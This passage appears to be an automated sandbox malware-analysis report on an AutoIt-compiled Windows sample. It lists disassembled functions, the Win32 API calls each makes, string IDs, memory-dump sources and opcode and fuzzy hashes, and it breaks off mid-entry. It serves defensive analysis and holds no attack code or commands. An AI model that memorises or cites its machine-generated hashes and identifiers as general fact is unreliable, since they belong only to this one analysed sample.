                                                                                                                                                                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                                    • String ID: 0$2
                                                                                                                                                                                                                                                                                                    • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                                    • Opcode ID: e4157b894a2bdf626a6851bc3ebe0301702f852e7852e67e23bf4a37a5d7064b
                                                                                                                                                                                                                                                                                                    • Instruction ID: cfad9ccdecd60389bb5eeb766fd33d31be2ee9b096fa40115c07195cea60b209
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4157b894a2bdf626a6851bc3ebe0301702f852e7852e67e23bf4a37a5d7064b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6519070A002059BDF18CFA8DD84BAEBBF9AF45324F24C11EE95997291EB709941CF51
                                                                                                                                                                                                                                                                                                    Function 00A7D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00A7D1BE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconLoad
                                                                                                                                                                                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0a1aa02da4311bf683ca14c0c8660a341523c3851ab49f22f4861c34875419f3
                                                                                                                                                                                                                                                                                                    • Instruction ID: ca1f30031d8a00cd7f77c80ba292ff6edd70353ca9c9a56de9d6b4ce3c83b1e4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a1aa02da4311bf683ca14c0c8660a341523c3851ab49f22f4861c34875419f3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE11E93534C306BEE7095B54DC82DAE77BC9F19B60F60C52BF90DA62C1F7B4AA404260
                                                                                                                                                                                                                                                                                                    Function 00A7E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                                    • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                                    • Opcode ID: 388bffe79fd90f79f61311a099c6ce3fca213b87c6571df639e2991b1047533d
                                                                                                                                                                                                                                                                                                    • Instruction ID: aa1d4366263afea8b207e55f8eca335ea42b834afc408277416e42b6d4e4bd05
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 388bffe79fd90f79f61311a099c6ce3fca213b87c6571df639e2991b1047533d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F112C315001157FCB28E770DD4AEDE777CEF09714F0080A6F54AA6091EF749A82D750
                                                                                                                                                                                                                                                                                                    Function 00A7F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 018a404c302df4119bf1afbceaa185cdbb8695ae519f19ef9c5294b164224bae
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3c414e960a75b43029ef4b0657292d337ff3e6effa31f79b2307dbdf5cf77871
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 018a404c302df4119bf1afbceaa185cdbb8695ae519f19ef9c5294b164224bae
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B418F65C11614B9CB15EBB98D8BACFB7A8AF05310F50C866F518E3121FB34E365C3A6
                                                                                                                                                                                                                                                                                                    Function 00A2FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A539E2,00000004,00000000,00000000), ref: 00A2FC41
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00A539E2,00000004,00000000,00000000), ref: 00A6FC15
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00A539E2,00000004,00000000,00000000), ref: 00A6FC98
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b855c4cfe9cccaaf6553f23434a93da7263a91757d62fa935fdce273c2b8e48a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2bbba98a2179e96904e5559ba541117525246000dbf876270bcbd904271e328d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b855c4cfe9cccaaf6553f23434a93da7263a91757d62fa935fdce273c2b8e48a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB4117306083989EC739CB3CF998B7A7BB5AB4B311F24453CE98757EA0C631A881C711
                                                                                                                                                                                                                                                                                                    Function 00AA379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00AA37B7
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00AA37BF
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AA37CA
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00AA37D6
                                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00AA3812
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AA3823
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AA6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00AA385E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AA387D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 54d1c6ccb36370607ddfe8bdfcc2d527fb60c703b068eef2d4eab2c4c643dd76
                                                                                                                                                                                                                                                                                                    • Instruction ID: 739254f157759ecbf844a52dccdd66c903f43f5bd5461b6569b6e2640863c3b1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54d1c6ccb36370607ddfe8bdfcc2d527fb60c703b068eef2d4eab2c4c643dd76
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4318D72201214BFEB158F90CC89FEB3BA9EB4A751F044065FE499A1D1C7B59841C7A0
                                                                                                                                                                                                                                                                                                    Function 00A95A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                    • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                                    • Opcode ID: 702770c299210c266ccb975c54c7d27efd2e9e6b08045c5ef0244f1c788fa7b5
                                                                                                                                                                                                                                                                                                    • Instruction ID: ef5a4a9a01ce7d5a1c8ab7286e24b1e8f1a5a9fe571acb6deb4718be0ed613f6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 702770c299210c266ccb975c54c7d27efd2e9e6b08045c5ef0244f1c788fa7b5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80D18C71F0060AAFDF11CFA8C886AAEB7F5BF48304F148569E915AB281E770ED45CB50
                                                                                                                                                                                                                                                                                                    Function 00A518A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00A51B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00A5194E
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A519D1
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A51B7B,?,00A51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A51A64
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A51A7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A36A79,?,0000015D,?,?,?,?,00A385B0,000000FF,00000000,?,?), ref: 00A43BC5
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00A51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A51AF7
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00A51B22
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00A51B2E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f36e2e1076aeeb7d83c50f86630a66586e12ef4bfe872ccd996e8f4612f2e776
                                                                                                                                                                                                                                                                                                    • Instruction ID: e3c868f25e6bd2a53d13fdd393141b0c87f6ddbf309e1b0c2ee4fb0bc2d959b4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f36e2e1076aeeb7d83c50f86630a66586e12ef4bfe872ccd996e8f4612f2e776
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E291B072E00216AADB218FA4C891BFEBBB5BF49351F190219ED11E7280E735CC49C7A0
                                                                                                                                                                                                                                                                                                    Function 00A94F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                    • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                                    • Opcode ID: 997d1ecc782da01663454ccf73b9feaaab5a5b1d1c666b47493f189bb38672ff
                                                                                                                                                                                                                                                                                                    • Instruction ID: 50d5d6a8bb7b336e86c59978eb344c07a7a52dd9b826a0e092571fd0719524cf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 997d1ecc782da01663454ccf73b9feaaab5a5b1d1c666b47493f189bb38672ff
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86919B71E00619AFDF25DFA4C88AFAEBBF8AF45714F108619F505AB280D7709945CFA0
                                                                                                                                                                                                                                                                                                    Function 00A81B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00A81C1B
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A81C43
                                                                                                                                                                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00A81C67
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A81C97
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A81D1E
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A81D83
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A81DEF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1b99a13f14bfafa9ebb9aa3170de94d6e43a5ca636f711305c0a9f727cb7664c
                                                                                                                                                                                                                                                                                                    • Instruction ID: e61305e1702f3a7fce46b05c3e7058631f731d015938ed7994046504580a8a2f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b99a13f14bfafa9ebb9aa3170de94d6e43a5ca636f711305c0a9f727cb7664c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A691F3B5A00219AFDB00EF98C885BFEB7B8FF05711F144429E951EB291E774E942CB90
                                                                                                                                                                                                                                                                                                    Function 00A943A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00A943C8
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00A944D7
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A944E7
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00A9467C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8169E: VariantInit.OLEAUT32(00000000), ref: 00A816DE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8169E: VariantCopy.OLEAUT32(?,?), ref: 00A816E7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8169E: VariantClear.OLEAUT32(?), ref: 00A816F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8ab11a9b0f5a720f448abde69cb5cd7e3351ad219c0c51bb0720c0f260896a63
                                                                                                                                                                                                                                                                                                    • Instruction ID: e97d5400650a05f409eb8c4b9c9282e18ff35befe8118c11a6ebc4b1ffdbe582
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ab11a9b0f5a720f448abde69cb5cd7e3351ad219c0c51bb0720c0f260896a63
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 549148746083019FCB04DF64C58196ABBE5FF89714F14892DF88A97351DB31ED46CB92
                                                                                                                                                                                                                                                                                                    Function 00A9560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A708FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?,?,00A70C4E), ref: 00A7091B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A708FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?), ref: 00A70936
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A708FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?), ref: 00A70944
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A708FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?), ref: 00A70954
                                                                                                                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00A956AE
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A957B6
                                                                                                                                                                                                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00A9582C
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00A95837
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
